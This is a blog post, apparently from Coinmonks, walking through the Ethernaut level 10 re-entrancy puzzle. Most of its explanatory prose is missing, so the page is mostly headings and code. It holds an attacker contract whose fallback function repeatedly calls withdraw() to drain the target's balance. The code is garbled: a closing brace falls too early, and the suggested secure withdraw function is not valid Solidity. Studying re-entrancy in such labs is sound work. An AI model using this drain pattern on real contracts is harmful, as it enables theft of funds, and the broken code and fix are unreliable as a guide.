Coinmonks
Published in

Coinmonks

Ethernaut Lvl 10 Re-entrancy Walkthrough: How to abuse execution ordering and reproduce the DAO hack

This is a in-depth series around Zeppelin team’s smart contract security puzzles. We learn key Solidity concepts to solve the puzzles 100% on your own.

What is re-entrancy

Example of poor code ordering: transferring the amount before deducting from internal balances ledger

Detailed Walkthrough

contract Reenter {
Reentrance public original = Reentrance(YOUR_INSTANCE_ADDR);
uint public amount = 1 ether; //withdrawal amount each time
}
constructor() public payable {
}
function donateToSelf() public {
original.donate.value(amount).gas(4000000)(address(this));//need to add value to this fn
}
function() public payable {
if (address(original).balance != 0 ) {
original.withdraw(amount);
}
}

Key Security Takeaways

function withdraw(uint _amount) public {
if(balances[msg.sender] >= _amount) {
balances[msg.sender] -= _amount;
if(msg.sender.transfer(_amount)()) {
_amount;
}
}
}
// Or even better, invoke transfer in a separate function

More Levels

Get Best Software Deals Directly In Your Inbox

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store